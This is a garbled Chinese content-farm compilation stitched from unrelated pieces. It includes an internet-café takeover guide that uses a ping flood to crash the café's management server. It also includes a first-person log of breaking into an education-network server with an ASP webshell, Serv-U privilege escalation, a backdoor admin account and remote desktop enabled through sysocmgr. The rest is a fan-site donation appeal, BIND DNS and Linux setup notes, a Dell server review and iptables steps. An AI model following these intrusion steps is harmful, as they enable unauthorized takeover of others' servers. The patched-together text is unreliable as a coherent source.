以下是小编精心整理的攻下某服务器全过程(共含8篇),仅供参考,希望能够帮助到大家。同时,但愿您也能像本文投稿人“zhouyu2000”一样,积极向本站投稿分享好文章。
首先, 选定一家网吧,当他打开主机,系统是锁住的,
攻下某服务器全过程
。(实际上,万象网吧管理系统并没有将系统锁住,只是限制了鼠标的移动范围)解开系统的方法很多,利用最多的是通过智能拼音ABC的输入法漏洞,方法就不在这里介绍了,相信大家都知道,但值得一提的是,当 解开系统将万象的文件改名或删除后,如果主机安装了还原精灵,那么重新启动计算机后系统仍然是锁住的。因为还原精灵是最先启动的,将被改名或删除的文件还原。解决的方法就是在解开系统后打开注册表将还原精灵在启动栏中去掉,这样主机重启后系统就是打开的了。
好了,现在 就要开始真正的入侵。首先, 必须下载万象的安装程序,下载地址为:www.intous.com,下载完成后先放着。为什么不安装呢?原因是这样:在一个网吧中,所有的电脑分为客户端和服务端,客户端就是我们上网的主机。而服务端就是服务器,也就是网管用的主机。网管通过服务端向客户端发 各种指令,向开机,关机,结帐等等。也就是说,服务端控制着整个网吧。 下载了安装程序后可以选择是安装客户端还是服务端,当然是安装客户端。但不是立即就安装。因为 所用的主机实际上就是个客户端,这在服务端上显示的很清楚。
比如说你坐的是24号机,那么在服务端上就会显示24号机的各种情况,一旦安装了服务端。首先,作为客户端的24号机序列号就会被破坏,这在服务端上会显示出来,这样网管就会来查看原因,真正的 当然不会犯这种危险的错误,
而且,安装服务端后一个网吧就会有两个服务端,系统不知道应该执行哪个服务端的命令,往往会造成两个服务端都可以控制客户端,这也不是 想要达到的目的。所以 , 要想完全独立的控制整个网吧,就要入侵真正的服务器并使其系统崩溃,是真正的服务器消失,这时在接替原来的服务端,是本来这个客户端成为新的服务端。这种方法不但控制了整个网吧,而且还不会被网管发现,所以是 的常用手段。
那么, 是怎样令服务器系统崩溃的呢? 答案很简单:攻击服务器。
攻击服务器的方法也是有很多种的,这里介绍一下用PING命令使网络瘫痪的方法,我们知道,PING命令可以向目标主机发送数据包,但是这里存在一个漏洞,就是当你向目标主机发送的数据包超过65532byt时,就会造成目标主机死机或者重启。所以,微软公司就限制了数据包的大小,使发送的数据包不能超过65500byt。
但是,即使是65500的数据包,如果不断的发送,也会造成目标主机的瘫痪, 们用这个命令:ping -1 655 00 -t
192.168.1.025(输入的IP地址是要攻击的主机的IP,这里是随便举个例子)这个命令会向目标主机不断 的发送65500的数据包,知道系统瘫痪为止,一般不会超过10分钟。所以, 向网吧服务器发送这个命令,不就服务器瘫痪,整个网吧吊线。 就乘机接管服务器。但这里还有个问题,如何获得服务器的IP呢?其实很简单,只要用扫描工具扫描一下本机IP,将最后一个数值改为1就可以了,比如本机的IP是192.168.1.023,那么服务器的IP就是192.168.1.01。
彩虹妹妹
我从学习到现在有一个月时间了,在华夏我学到不少知识. 下面我把头几天入侵某教育网全过程写下来,希望对刚入门的朋友有所帮助! 咱们共同学习!
1. 发现某站存在upfile.asp文件, 上传桂林老兵asp助手木马. (在这里我多说几句,asp木马很多,我个人感觉海洋顶端最垃圾, 老兵的还可以,最好的是kker的cs木马! 个人观点!)
2.登陆木马运行DOS命令,可提示说没有权限无法运行.
3.上传cmd.exe和net.exe文件到F盘(在这个盘我有执行权限,其它盘都没有)
4.ok了,可以运行dos了,但发现只能用net user查看用户, 不能用net user xxx xxx /add 添加用户.
看来走DOS这条路行不通了! 试试SQL注入, TMD试了半天,一个注入点没找到! 换方法.接着往下看.
5. 发现F盘存在serv-u , 哈哈~~~~ 大喜! 上传ftp.exe 本地提升权限.运行F:Serv-Uftp.exe “net user fdd fdd /add” 和F:Serv-Uftp.exe “net localgroup administrators fdd /add” 命令.成功把fdd变成了管理员.
6.运行F:Serv-Uftp.exe “net start telnet” 命令.成功开启telnet.
到第6步我以为彻底搞定了.可惜一连上telnet就提示与主机失去联系. 我已经做NTML验证了.为什么登陆不上呢? 原来是有防火墙! TNND (防火墙可以用pskill.exe杀掉,也可以自己写脚本然后用ntsd命令杀.这里我就不说了)
7.这台机器不是有serv-u吗? 我建个超管帐号,登陆他的FTP上去试试.于是修改serv-u目录下的ServUDaemon.ini文件.加了个超管帐号,可是无法登陆.TMD,为什么啊? 原来是需要从起servu才能生效.
8.net stop 对! 用net stop ! 用 net stop serv-u命令把ftp停了! 然后再启动serv-u.
9. 哈哈成功登陆对方FTP, 上传fd文件到上面.fd文件里面的内容是[Components] TsEnable = on.这个大家都知道. 运行Quote site exec sysocmgr.exe /i:c:winntinfsysoc.inf /u:c:fd /q
哈哈~~~~~~~~ 3389打开了,成功登陆! 网速不错,下载速度1M/秒!
上面这些就是我入侵某服务器的全过程,走了不少弯路. 希望对新入门的朋友能有所帮助. 谢谢!
某网站社区捐款倡议书(购买服务器)
由于我们现在使用的论坛服务器由[99互联]赞助!我们不能给99互联公司带来一定的广告效益,因此限制了我们很多权限,不知道大家有没有发现有时候访问论坛时速度时快时慢,有时候不能访问,还有的时候你登录后返回到首页HTTP500内部服务器出错。这些原因都是由服务器引起的!但这些问题我都跟99互联交涉过,没有什么用处。我们决定购买一台真正属于自己的`服务器!
购买服务器需要1元人民币。12000元也不是个小数目,由于本人现还是学生无经济收入,无法承担这个巨额!因此提出这个建议想联迷一起来捐款购买服务器(服务器配置P4 3.0 64位/80G SATA 硬盘/1024MB DDR内存)按论坛会员总数来计算,我们一共有1400多位会员如果每人捐款10元,那我们就足够了;如果不愿意捐款的联迷也没关系,你还可以继续支持易建联和易建联中文网!
--------------------------------------------------------------------------------
购买服务器后,我们将开设更多的平台:
1、下载平台:因为我们平时找到易建联的视频都发布于一些免费的网站硬盘,但免费的时间不会很长,所以这样我们可以提供下载。丰富联迷的眼球
2、娱乐平台:有了服务器之后可以提供我们联迷的个人主页、翻唱、音乐系统……更加完善一个门户网站
3、联迷相册具体方案还在进一步审定中……
捐款分为四部分:
1、由木乱总管理
2、由广东会长(AIKO负责)
3、由江苏会长(TTI负责)
4、由百度贴吧(联轩¢易负责)
木乱捐款账号如下: 汇款单范例
1、邮寄汇款(无须任何证件)
邮寄地址:
收款人:
2、中国工商银行汇款(需要本人或者他人身份证/户口本也可用)
中国工商银行汇款卡号:
收款人:
3、中国农业银行汇款(需要本人或者他人身份证/户口本也可用)
中国农业银行汇款卡号:
收款人:
4、中国邮政储蓄汇款(无须任何证件)
收款人:
二、广东联迷可以把资金捐入广东分会会长(AIKO)
1、收款人地址:
邮编:
收款人:
2、中国工商银行汇款(需要本人或者他人身份证/户口本也可用)
中国工商银行汇款卡号:
收款人:
三、江苏联迷可以把资金捐入江苏分会会长(TTI)
1、中国农业银行汇款(需要本人或者他人身份证/户口本也可用)
中国农业银行汇款卡号:
收款人:
2、邮寄汇款:
邮寄地址:邮编:
收款人:
四、百度贴吧联迷可以捐入百度贴吧管理员处(联轩¢易)
1、收款人地址: 邮编:
收款人:
2、中国工商银行汇款(需要本人或者他人身份证/户口本也可用)
中国工商银行汇款卡号:
收款人:
汇款后请联迷与当地管理部门联系:
如汇到木乱的卡号或者邮寄了请跟木乱联系,如汇其他的地方管理员手中请跟汇的卡号和邮寄管理员联系!以下是管理员的联系方式:
木乱QQ:67666688 手机:(0)13666685010
广东分会会长QQ:188414825 手机:(0)13760806861
江苏分会会长QQ:359494539 手机:(0)13770984983
联轩¢易QQ:418098925 手机:(0)13758271774
捐款专用群:0285
望企事业单位能赞助我们发展
易建联中文网开办不到一年的时间里已有注册会员1800多人、日平均IP在1500左右、网站排名在350000左右(无作弊)PR值=2 新浪网媒体曾多次报道过我们网站!百度共有694页收入量、Google共有45页收入量、雅虎共有164页收入量、新浪共有197页收入量、爱问共有197页收入量。易建联中文网在一年的发展过程中能够得到这么多人的关心和支持是件不容易的事情!
如有企事业单位赞助我们发展请与管理员联系:
联系电话:
某网站社区捐款倡议书(购买服务器)*网站服务器
主要任务:
根据开发设计需求架设大型的网站服务器
主要软件:
以下为引用的内容:
apache+jboss+oracle
简称:LAJO
apache+php+mysql
简称:LAMP
proftpd+mysql
简称:LPM
ssh+expect
iptables
bind
具体要求:
海量用户访问
海量用户存储
(国内外互通)
南北互通
需求分析:
1、保证高要求高质量高性能,需要选择系*nix操作平台(这里选择as4.3);
2、保证高访问量高数据处理,需要选数商业数据库(这里选择oracle9.2.0.4);
3、解决南北互通(包括国内外互通),需要架设基于bind-view功能的智能DNS服务器;
4、使用流行的B/S,C/S程序架构,需要选择了JBOSS服务器;
5、更好地处理静态页面效果,需要选择了Apache服务器;
6、根据程序注册用户与上传要求,需要架设ftp服务器;
7、时时自动化系统监控,需要架设LAPM服务器.(这里使用软件cacti);
8、公司与客户交流,需要架设邮件服务器.(这里使用postfix+extmail);
9、自动化文件数据处理与安全设置,需expect+ssh+iptables结合shell脚本;
10、海量,需要集群负载均衡与配备存储设备;
具体流程:
1、硬件采购,
2、操作系统安装
安装redhat as 4.3
系统空间划分(略)
安装开发环境,DNS,LAMP环境所需软件包。
并确认以下包已安装:
以下为引用的内容:
compat-db
compat-gcc
compat-gcc-32
compat-oracle-rhel4
compat-libcwait
compat-libgcc
compat-libstdc++-296
compat-libstdc++-33
gcc
gcc-c++
gnome-libs
gnome-libs-devel
libaio-devel
libaio
make
openmotif21
xorg-x11-deprecated-libs-devel
xorg-x11-deprecated-libs
sysstat disk4
openmotif21 disk3
libaio disk3
libaio-devel disk3
freetype-devel disk3
fontconfig-devel disk3
xorg-x11-devel- disk3
xorg-x11-deprecated-libs-devel- disk3
glib-devel disk4
ORBit-devel disk4
gtk+-devel disk4
alsa-lib-devel disk3
audiofile-devel disk3
esound-devel- disk3
libjpeg-devel- disk3
libtiff-devel- disk3
libungif-devel- disk3
imlib-devel disk4
gnome-libs-devel disk4
expect disk4
注意:我遇到的一个问题:全新的dell服务器1.5T,raid5,重没有安装过任何系统,硬盘也没有分区,直接用as4.3安装盘安装提示:内存错误,蓝屏,而安装失败。用了好几种linux系统盘(包括windows安装盘)都如此,(手里没有硬盘格式分区工具,没有测试是否可以硬盘分区。)官方发行版说不支持超过2G内存,于是安装系统时先卸下2G内存,待安装完毕在请求支持超过2G内存的内核安装后就可以支持4G内存了,倘如日后全新安装系统不使用hugemem而使用默认的smp内核也能识别4G内存,更不会出现蓝屏问题。关于之中奥妙,还没有仔细研究过。
#rpm –ivh kernel-elhugemem….rpm
修改启动文件grub.conf确保新安装的内核为优先启动。
以下为引用的内容:
#cat /etc/grub.conf
////////////////////////////////////////////////////////////////////
# grub.conf generated by anaconda
#
# Note that you do not have to rerun grub after making changes to this file
# NOTICE: You have a /boot partition. This means that
# all kernel and initrd paths are relative to /boot/, eg.
# root (hd0,1)
# kernel /vmlinuz-version ro root=/dev/sda8
# initrd /initrd-version.img
#boot=/dev/sda
default=0
timeout=5
splashimage=(hd0,1)/grub/splash.xpm.gz
hiddenmenu
title Red Hat Enterprise Linux AS (2.6.9-22.ELhugemem)
root (hd0,1)
kernel /vmlinuz-2.6.9-22.ELhugemem ro root=LABEL=/ rhgb quiet
initrd /initrd-2.6.9-22.ELhugemem.img
title Red Hat Enterprise Linux AS (2.6.9-22.ELsmp)
root (hd0,1)
kernel /vmlinuz-2.6.9-22.ELsmp ro root=LABEL=/ rhgb quiet
initrd /initrd-2.6.9-22.ELsmp.img
title Red Hat Enterprise Linux AS-up (2.6.9-22.EL)
root (hd0,1)
kernel /vmlinuz-2.6.9-22.EL ro root=LABEL=/ rhgb quiet
initrd /initrd-2.6.9-22.EL.img
////////////////////////////////////////////////////////////////////////////////////////////////
如果hiddenmenu
下面的内容顺序不对,请修改default=x(x对应ELhugemem项)
重启并加载另外2G内存。
这样让系统支持4G内存的正常运行。
2)系统安装完毕请 作连接: #ln –s /tmp /temp
3、配置DNS
由于要南北互通,开源得只有使用view的ACL访问控制列表文件来实现多线路的自动导向。
(当然也有其他的商业解决办法,比如智能路由与交换机的设置来实现,我们这里使用开源的而且容易实现与调整的解决软件bind)
关于view的ACL获得办法有很多途径,这里不一一商讨。
具体架设参考如下
默认安装的bind为9系列的,已经支持view,配置分为三步骤分别如下所示。
(1)修改named.conf
(2)创建与配置hosts
(3)域名解析
以下为引用的内容:
#vi /etc/named.conf
////////////////////////文件内容开始///////////////////
//
// named.conf for Red Hat caching-nameserver
//
options {
directory “/var/named”;
dump-file “/var/named/data/cache_dump.db”;
statistics-file “/var/named/data/named_stats.txt”;
/*
* If there is a firewall between you and nameservers you want
* to talk to, you might need to uncomment the query-source
* directive below. Previous versions of BIND always asked
* questions using port 53, but BIND 8.1 uses an unprivileged
* port by default.
*/
// query-source address * port 53;
};
//
// a caching only nameserver config
//
controls {
inet 127.0.0.1 allow { localhost; } keys { rndckey; };
};
include “/etc/rndc.key”;
//modify by mingfu 060404
acl “CNC” {
58.16.0.0/16;
58.17.0.0/17;
58.17.128.0/17;
58.18.0.0/16;
58.19.0.0/16;
58.20.0.0/16;
58.21.0.0/16;
58.22.0.0/15;
58.240.0.0/15;
58.242.0.0/15;
58.244.0.0/15;
58.246.0.0/15;
58.248.0.0/13;
60.0.0.0/13;
60.8.0.0/15;
60.10.0.0/16;
60.11.0.0/16;
60.12.0.0/16;
60.13.0.0/18;
60.13.128.0/17;
60.14.0.0/15;
60.16.0.0/13;
60.24.0.0/14;
60.30.0.0/16;
60.31.0.0/16;
60.208.0.0/13;
60.216.0.0/15;
60.218.0.0/15;
60.220.0.0/14;
61.48.0.0/13;
61.133.0.0/17;
61.134.96.0/19;
61.134.128.0/17;
61.135.0.0/16;
61.137.128.0/17;
61.138.0.0/17;
61.138.128.0/18;
61.139.128.0/18;
61.148.0.0/15;
61.156.0.0/16;
61.159.0.0/18;
61.161.0.0/18;
61.161.128.0/17;
61.162.0.0/16;
61.163.0.0/16;
61.167.0.0/16;
61.168.0.0/16;
61.176.0.0/16;
61.179.0.0/16;
61.181.0.0/16;
61.182.0.0/16;
61.189.0.0/17;
125.32.0.0/16;
125.40.0.0/13;
202.96.0.0/18;
202.96.64.0/21;
202.96.72.0/21;
202.97.128.0/18;
202.97.224.0/21;
202.97.240.0/20;
202.98.0.0/21;
202.98.8.0/21;
202.99.64.0/19;
202.99.96.0/21;
202.99.128.0/19;
202.99.160.0/21;
202.99.168.0/21;
202.99.176.0/20;
202.99.208.0/20;
202.99.224.0/21;
202.99.232.0/21;
202.99.240.0/20;
202.102.128.0/21;
202.102.224.0/21;
202.102.232.0/21;
202.106.0.0/16;
202.107.0.0/17;
202.108.0.0/16;
202.110.0.0/17;
202.111.128.0/18;
203.93.8.0/24;
203.93.192.0/18;
210.13.128.0/17;
210.14.160.0/19;
210.14.192.0/19;
210.15.32.0/19;
210.15.96.0/19;
210.15.128.0/18;
210.21.0.0/16;
210.52.128.0/17;
210.53.0.0/17;
210.53.128.0/17;
210.74.96.0/19;
210.74.128.0/19;
210.82.0.0/15;
218.8.0.0/14;
218.12.0.0/16;
218.21.128.0/17;
218.24.0.0/14;
218.56.0.0/14;
218.60.0.0/15;
218.67.128.0/17;
218.68.0.0/15;
218.104.0.0/14;
219.154.0.0/15;
219.156.0.0/15;
219.158.0.0/17;
219.158.128.0/17;
219.159.0.0/18;
220.252.0.0/16;
221.0.0.0/15;
221.2.0.0/16;
221.3.0.0/17;
221.3.128.0/17;
221.4.0.0/16;
221.5.0.0/17;
221.5.128.0/17;
221.6.0.0/16;
221.7.0.0/19;
221.7.32.0/19;
221.7.64.0/19;
221.7.96.0/19;
221.8.0.0/15;
221.10.0.0/16;
221.11.0.0/17;
221.11.128.0/18;
221.11.192.0/19;
221.12.0.0/17;
221.12.128.0/18;
221.13.0.0/18;
221.13.64.0/19;
221.13.96.0/19;
221.13.128.0/17;
221.14.0.0/15;
221.192.0.0/15;
221.194.0.0/16;
221.195.0.0/16;
221.196.0.0/15;
221.198.0.0/16;
221.199.0.0/19;
221.199.32.0/20;
221.199.128.0/18;
221.199.192.0/20;
221.200.0.0/14;
221.204.0.0/15;
221.206.0.0/16;
221.207.0.0/18;
221.207.64.0/18;
221.207.128.0/17;
221.208.0.0/14;
221.212.0.0/16;
221.213.0.0/16;
221.216.0.0/13;
222.128.0.0/14;
222.132.0.0/14;
222.136.0.0/13;
222.160.0.0/15;
222.162.0.0/16;
222.163.0.0/19;
222.163.32.0/19;
222.163.64.0/18;
222.163.128.0/17;
};
view “view_cnc” {
match-clients { CNC; };
zone “.” {
type hint;
file “named.ca”;
};
zone “0.0.127.IN-ADDR.ARPA” {
type master;
file “localhost.rev”;
};
include “master/cnc.def”;
};
view “view_any” {
match-clients { any; };
zone “.” {
type hint;
file “named.ca”;
};
zone “0.0.127.IN-ADDR.ARPA” {
type master;
file “localhost.rev”;
};
include “master/telecom.def”;
};
////////////////////////文件内容结束///////////////////
#mkdir /var/named/master
#mkdir /var/named/master/cnc
#mkdir /var/named/master/telecom
#touch /var/named/master/cnc.def
#touch /var/named/master/telecom.def
说明:关于如何进行域名解析配置:
@Zone区文件配置:
以下为引用的内容:
Master/Cnc.def 网通
Master/Telecom.def 电信
*.def文件里面为解析域名的zone配置区设置部分.
@Hosts 区文件配置
Master/Cnc 网通
Master/Telecom 电信
下面以解析www.xxxx.com为例
#vi /var/named/master/cnc.def
////////////////////////文件内容开始///////////////////
zone “xxxx.com” {
type master;
file “master/cnc/xxxx.com”;
};
////////////////////////文件内容结束///////////////////
#vi /var/named/master/telecom.def
////////////////////////文件内容开始///////////////////
zone “xxxx.com” {
type master;
file “master/telecom/xxxx.com”;
};
////////////////////////文件内容结束///////////////////
#vi /var/named/master/cnc/xxxx.com
////////////////////////文件内容开始///////////////////
$TTL 3600
$ORIGIN xxxx.com.
@ IN SOA ns.xxxx.com. root.ns.xxxx.com.(
121013 ;Serial
3600 ; Refresh ( seconds )
900 ; Retry ( seconds )
68400 ; Expire ( seconds )
15 );Minimum TTL for Zone ( seconds )
;
@ IN NS ns.xxxx.com.
@ IN MX xxxx.com.
;;ip for cnc
@ IN A x.x.x.x(网通IP)
www IN A x.x.x.x(网通IP)
////////////////////////文件内容结束///////////////////
#vi /var/named/master/telecom/xxxx.com
////////////////////////文件内容开始///////////////////
$TTL 3600
$ORIGIN xxxx.com.
@ IN SOA ns.xxxx.com. root.ns.xxxx.com.(
2005121013 ;Serial
3600 ; Refresh ( seconds )
900 ; Retry ( seconds )
68400 ; Expire ( seconds )
15 );Minimum TTL for Zone ( seconds )
;
@ IN NS ns.xxxx.com.
@ IN MX xxxx.com.
;;ip for telecom
@ IN A x.x.x.x(电信IP)
www IN A x.x.x.x(电信IP)
////////////////////////文件内容结束///////////////////
客服端测试:
nslookup --type=a xxxx.com x.x.x.x(网通任意一个DNS服务器IP)
nslookup --type=a xxxx.com x.x.x.x(电信任意一个DNS服务器IP)
看到的为配置文件中对应ip则解析配置正常,
注意:
上面的xxxxx.com需要修改DNS解析服务器为
ns.xxxxx.com
对应IP为:网通IP。
备注:
1)、在这里做了网通与非网通的访问控制,用于实现南北互通,如要国内外互通,需要在列出一个相应的访问控制列表ACL就可以实现了。
2)、关于使用tar包编译。
DellPowerEdge2850服务器
最近《网络世界》评测实验室对这一产品进行了严格的测试,虽然距离其发布有一年多的时间,但凭借其高处理能力、强大的可扩展性、管理和易用性仍旧给我们留下了深刻的印象,
高易用性
随机的配置软件很好用,即使是装机,你也不用插手太多,管理软件会帮你把事情办妥。还没有拿到PowerEdge2850的时候,一位朋友这样评价这款机器。
朋友是Dell在中国的大用户,采购了大量的PowerEdge2850服务器,提供给他们的客户运行该公司的大型软件(包括数据库等关键应用)。拿到这款服务器之后,引导盘放入光驱,按照引导程序的指引,非常顺利地安装了WindowsServer版软件,完成了分区、IP地址分配、域控制服务器等相关服务器的配置。通常令人头疼的RAID系统的配置安装,在这里变得非常轻松,驱动程序、配置也一并完成,没有遇到任何的麻烦。引导安装程序是一个Linux内核的程序,设计非常人性化。
在朋友的指点下,我只是在估算好的时间才进入机房,进行必要的操作,绝大多数时间在安静的办公区完成其他的工作。
PowerEdge2850携带了Dell公司提供的远程管理、监控系统软件,方便用户远程操作。但值得称道的是,Dell服务器上有一块监控用的子卡DRAC4/I(thefourth-generationDellRemoteAccessController),这个管理卡提供以太网接口(带内管理),和串口。这意味着网络管理员可以远程地监控服务器,特别是可以远程地观测服务器启动的过程、BIOS的错误,这无疑是革新性质的变化。DRAC提供了SNMP的管理功能,而在用户使用Telnet管理服务器的时候,还提供了SSL的加密功能,
结合了OpenManage软件,该服务器还可以实现远程的安装。
精心设计的机箱
机架式服务器的好处是在很小的空间提供了高的计算密度。但同样也让用户对服务器的散热、可扩展性产生疑虑。PowerEdge2850在这方面很好地回应了所有的挑战。
强劲的风扇是为了更好散热,但是更多的功夫在于内部结构的设计。在机箱中,Dell的工程师优化了内部结构,双模组的冗余电源、扩展槽被合理地分配在机箱两边,而发热大户的处理器、内存都很好地被冗余的强劲风扇系统所覆盖。风道中,一方面在EM64T的至强处理器上采用了导热出色的热管,另一方面前有4个高速轴流风扇,产生了强劲的气流使得大体积的散热片得到了更好的散热效率。同时后方还有两个抽风的散热风扇,保证机箱内气体高速流通。根据系统温度的不同,这4个智能风扇会采用不同的转速。
散热系统提供了热插拔的设计,同时也提供了冗余配置,一方面风扇独立安装可以免工具替换,而冗余的风扇组设计能够保证在某一风扇出现故障时,由其余风扇加大送风量,保证合理的运行温度环境。并且通过前面的LCD液晶显示器提示故障,方便管理员及时处理。
冗余的设计还体现在电源方面,PowerEdge2850使用了两个700W的电源模块,每个模块采用独立的电源供给。同时Dell还向用户提供高品质的DellAPCUPS系统,保证系统电源的稳定性。
虽然是机架式服务器,PowerEdge2850的可扩展性仍旧惊人,在前面板提供了六个内置的硬盘仓,最大可以支持1.8TB的存储空间(6*300GB),用户还可以选择5个硬盘加磁带机的存储方案。PowerEdge2850设备内部集成了RAID,我们测试的服务器带两块硬盘,测试时配置为RAID1。同时它还支持基于SAN架构的由EMC提供的外部存储解决方案。服务器提供了双千兆网卡设置,由于网卡集成在主板上,不需要占用宝贵的扩展插槽。在扩展性上Dell提供了2种PCI子卡供用户选择,有三个64-bit/133MHz插槽的扩展卡和有2个PCI-E插槽(1个4通道和1个8通道)及1个64-bit/100MHzPCI-X插槽的扩展卡。
1、查看数据盘
在没有分区和格式化数据盘之前,使用 “df –h”命令,是无法看到数据盘的,可以使用“fdisk -l”命令查看。
2、对数据盘进行分区
执行“fdisk /dev/xvdb”命令,对数据盘进行分区;
根据提示,依次输入“n”,“p”“1”,两次回车,“wq”,分区就开始了,很快就会完成。
3、 查看新的分区
使用“fdisk -l”命令可以看到,新的分区xvdb1已经建立完成了。
4、格式化新分区
使用“mkfs.ext3 /dev/xvdb1”命令对新分区进行格式化,格式化的时间根据硬盘大小有所不同。
5、添加分区信息
使用“echo '/dev/xvdb1 /mnt ext3 defaults 0 0' >> /etc/fstab”命令写入新分区信息。
然后使用“cat /etc/fstab”命令查看信息。
6、挂载新分区
使用“mount -a”命令挂载新分区,然后用“df -h”命令查看是否成功。
至此,数据盘挂载成功,作为/mnt存在。
1、清除已经有的iptables规则:
iptables -F
iptables -X
iptables -Z2、开放指定端口:
(需要在防火墙里面留下你修改的SSH登陆端口:修改第4行,把22修改为你更换的端口)
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 21 -j ACCEPT
iptables -A INPUT -p tcp --dport 20 -j ACCEPT
iptables -A INPUT -j REJECT
iptables -A FORWARD -j REJECT
3、保存防火墙规则
service iptables save
★ 服务器维护方案
★ 服务器租赁合同
★ 服务器租用合同
